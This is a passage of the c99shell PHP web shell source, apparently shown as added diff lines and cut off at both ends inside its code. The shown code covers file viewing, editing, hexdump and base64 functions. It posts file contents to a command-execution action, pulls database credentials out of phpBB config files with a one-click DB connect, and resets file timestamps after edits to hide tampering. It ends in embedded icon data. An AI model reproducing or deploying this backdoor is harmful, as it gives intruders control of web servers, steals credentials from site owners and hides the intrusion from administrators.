$r = @file_get_contents($d.$f); + if (!is_readable($d.$f) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} + else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";} + } + else + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( +array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"), +array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"), +array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"), +array("Code","code"), +array("Session","phpsess"), +array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"), +array("SDB","sdb"), +array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"), +array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"), +array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"), +array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"), +array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit") +); + echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; + if (is_writable($d.$f)) {echo "<font color=\"green\">full read/write access (".view_perms(fileperms($d.$f)).")</font>";} + else {echo "<font color=\"red\">Read-Only (".view_perms(fileperms($d.$f)).")</font>";} + echo "</b><br>Select action/file-type:<br>"; + foreach($arr as $t) + { + if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=\"green\">".$t[0]."</font></a>";} + elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";} + else + { + echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>"; + } + echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |"; + } + echo "<hr size=\"1\" noshade>"; + if ($ft == "info") + { + echo "<b>Information:</b>"; + echo "<table class=tab border=0 cellspacing=1 cellpadding=2>"; + echo "<tr class=tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr>"; + echo "<tr class=tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; + if (!$win) + { + echo "<tr class=tr><td><b>Owner/Group</b></td><td> "; + $tmp=posix_getpwuid(fileowner($d.$f)); + if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." "; + else echo $tmp['name']." "; + $tmp=posix_getgrgid(filegroup($d.$f)); + if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f); + else echo $tmp['name']; + } + echo "<tr class=tr><td><b>Perms</b></td><td>"; + + if (is_writable($d.$f)) + { + echo "<font color=\"green\">".view_perms(fileperms($d.$f))."</font>"; + } + else + { + echo "<font>".view_perms(fileperms($d.$f))."</font>"; + } + + echo "</td></tr>"; + echo "<tr class=tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>"; + echo "<tr class=tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>"; + echo "<tr class=tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>"; + echo "</table><br>"; + + + $fi = fopen($d.$f,"rb"); + if ($fi) + { + if ($fullhexdump) + { + echo "<b>FULL HEXDUMP</b>"; + $str=fread($fi,filesize($d.$f)); + } + else + { + echo "<b>HEXDUMP PREVIEW</b>"; + $str=fread($fi,$hexdump_lines*$hexdump_rows); + } + $n=0; + $a0="00000000<br>"; + $a1=""; + $a2=""; + for ($i=0; $i<strlen($str); $i++) + { + $a1.=sprintf("%02X",ord($str[$i])).' '; + switch (ord($str[$i])) + { + case 0: $a2.="<font class=s2>0</font>"; break; + case 32: + case 10: + case 13: $a2.="&nbsp;"; break; + default: $a2.=htmlspecialchars($str[$i]); + } + $n++; + if ($n == $hexdump_rows) + { + $n = 0; + if ($i+1<strlen($str)) {$a0.=sprintf("%08X",$i+1)."<br>";} + $a1.="<br>"; + $a2.="<br>"; + } + } + //if ($a1!="") {$a0.=sprintf("%08X",$i)."<br>";} + echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4 ". + "class=sy><tr><td bgcolor=#666666> $a0</td><td bgcolor=000000>". + "$a1</td><td bgcolor=000000>$a2</td></tr></table><br>"; + } + $encoded = ""; + if ($base64 == 1) + { + echo "<b>Base64 Encode</b><br>"; + $encoded = base64_encode($r); + } + elseif($base64 == 2) + { + echo "<b>Base64 Encode + Chunk</b><br>"; + $encoded = chunk_split(base64_encode($r)); + } + elseif($base64 == 3) + { + echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; + $encoded = base64_encode($r); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + } + if (!empty($encoded)) + { + echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; + } + echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> + <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr> + <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr> + <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr> + <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr> + <P>"; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {exit;} + } + elseif ($ft == "txt") + { + echo "<pre>".htmlspecialchars($r)."</pre>"; + } + elseif ($ft == "ini") + { + echo "<pre>"; + var_dump(parse_ini_file($d.$f,true)); + echo "</pre>"; + } + elseif ($ft == "phpsess") + { + echo "<pre>"; + $v = explode("|",$r); + echo $v[0]."<br>"; + var_dump(unserialize($v[1])); + echo "</pre>"; + } + elseif ($ft == "exe") + { + echo "<form action=\"".$surl."act=cmd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"".htmlspecialchars($r)."\"><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;<input type=\"submit\" value=\"View&Edit command\"></form>"; + } + elseif ($ft == "sdb") + { + echo "<pre>"; + var_dump(unserialize(base64_decode($r))); + echo "</pre>"; + } + elseif ($ft == "code") + { + if (ereg("phpBB 2.(.*) auto-generated config file",$r)) + { + $arr = explode(" +",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "<b>phpBB configuration is detected in this file!<br>"; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."\"><b><u>Connect to DB</u></b></a><br><br>";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell";} + echo "Parameters for manual connect:<br>"; + $cfgvars = array( + "dbms"=>$dbms, + "dbhost"=>$dbhost, + "dbname"=>$dbname, + "dbuser"=>$dbuser, + "dbpasswd"=>$dbpasswd + ); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} + + echo "</b>"; + echo "<hr size=\"1\" noshade>"; + } + } + echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: #808080;\">"; + if (!empty($white)) {@ob_clean();} + if ($rehtml) {$r = rehtmlspecialchars($r);} + $r = stripslashes($r); + $strip = false; + if(!strpos($r,"<?") && substr($r,0,2)!="<?") {$r="<?php\n".trim($r)."\n?>"; $r = trim($r); $strip = true;} + $r = @highlight_string($r, TRUE); + if ($delspace) {$buffer = str_replace ("&nbsp;", " ", $r);} + echo $r; + if (!empty($white)) {exit;} + echo "</div>"; + } + elseif ($ft == "download") + { + @ob_clean(); + header("Content-type: c99shell"); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo($r); + exit; + } + elseif ($ft == "notepad") + { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") + { + if (!$white) + { + echo "<center><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" border=\"1\"></center>"; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: image/gif"); + echo($r); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + if (!is_writable($d.$f) and $autochmod) {@chmod($d.$f,$autochmod);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "<b>Can't write to file!</b>";} + else + { + echo "<b>Saved!</b>"; + fwrite($fp,$nfcontent); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $nfcontent; + } + } + $rows = count(explode(" +",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "<form method=\"POST\"><input type=\"submit\" name=\"submit\" value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=".$dspact."&d=".substr($d,0,strlen($d)-1))."';\" value=\"Back\"><br><textarea name=\"nfcontent\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; + } + elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} + else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} + } +} +if ($act == "phpinfo") +{ + ob_end_clean(); + phpinfo(); + exit; +} +} $data = base64_decode("PGNlbnRlcj48Yj5DcmVkaXRzOjxicj5JZGVhLCBsZWFkaW5nIGFuZCBjb2RpbmcgYnkgdHJpc3RyYW1bQ0NUZWFNXS48YnI+QmV0YS10ZXN0aW5nIGFuZCBzb21lIHRpcHMgLSBOdWtMZW9OIFtBblRpU2hAUmUgdEVhTV0uPGJyPlRoYW5rcyBhbGwgd2hvIHJlcG9ydCBidWdzLjxicj5BbGwgYnVncyBzZW5kIHRvIHRyaXN0cmFtJ3MgSUNRICM2NTY1NTUgPGEgaHJlZj0iaHR0cDovL3d3cC5pY3EuY29tL3NjcmlwdHMvY29udGFjdC5kbGw/bXNndG89NjU2NTU1Ij48aW1nIHNyYz1odHRwOi8vd3dwLmljcS5jb20vc2NyaXB0cy9vbmxpbmUuZGxsP2ljcT02NTY1NTUmaW1nPTUgYm9yZGVyPTAgYWxpZ249YWJzbWlkZGxlPjwvYT4uPC9iPiA8L2NlbnRlcj4gwOLy7vAg4vvw4Obg5fIg4evg4+7k4PDt7vHy/CDu5O3u7PMg7/Du4vMg6u7y7vD76SDu8urr/vfo6yDl4+4g7eAg7OXx//Yg7vIg6O3l8uAsIOgg5Ov/IPLu4+4g9/LuLeH7IO3lIPPs5fDl8vwg7vIg8erz6ugg7/Do+Ovu8fwg8+Pr8+Ho8vzx/yDiIO/w7uPw4Ozs6PDu4uDt6OUuIM/u5PLu6+rt8+vgIOog7eDv6PHg7ej+IOvl7fwg8SDq7vLu8O7pIP8g8+/w4OLr/+sg8eXw4uXw4OzoLjxjZW50ZXI+PGI+z/Dg4ujr4DwvYj46PC9jZW50ZXI+IDxiPsL7IOzu5uXy5SDo5+zl7f/y/CDv8O7j8ODs7PMg7+4gwuD45ezzIPPx7O7y8OXt6P4sIOzl7f/y/CDt4PHy8O7p6ugsIOTo5+Dp7S4uLiDt7iDl8evoIML7LCDz4uDm4OXs++ksIPPk4Ovo8uUg6OvoIPLl7CDh7uvl5SDo5+zl7ejy5SDq7u/o8ODp8vssIPLuIP8g4fPk8yDi++3z5uTl7SDu8u7w4uDy/CDi4Owg/+n24C4gPC9iPjxicj7A4vLu8CDt5SDt5fG48iDu8uLl8vHy4uXt7e7x8ugg5+Ag4u7n7O7m7fvpIOLw5eQsIO3g7eXxuO376SD98u7pIO/w7uPw4Ozs7uksIPIu6i4g7u3gIO/w5eTu8fLg4uvl7eAg8u7r/OruIOTr/yDu5+3g6u7s6+Xt6P8u"); +if ($act == "img") +{ + @ob_clean(); + + $arrimg = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhDwAQAJECAAAAAP///////wAAACH5BAEAAAIALAAAAAAPABAAQAIslI8pAOH/WGoQqMOC". +"vAtqxIReuC1UZHGLapAhdzqpEn9Y7Wlplpc3ynqxWAUAOw==", +"edit"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", +"small_unk"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". +"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". +"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". +"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". +"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". +"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". +"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". +"yAsokBkQADs=", +"sort_asc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", +"sort_desc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", +"sql_button_drop"=> +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". +"AQEAOw==", +"sql_button_empty"=> +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", +"sql_button_insert"=> +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 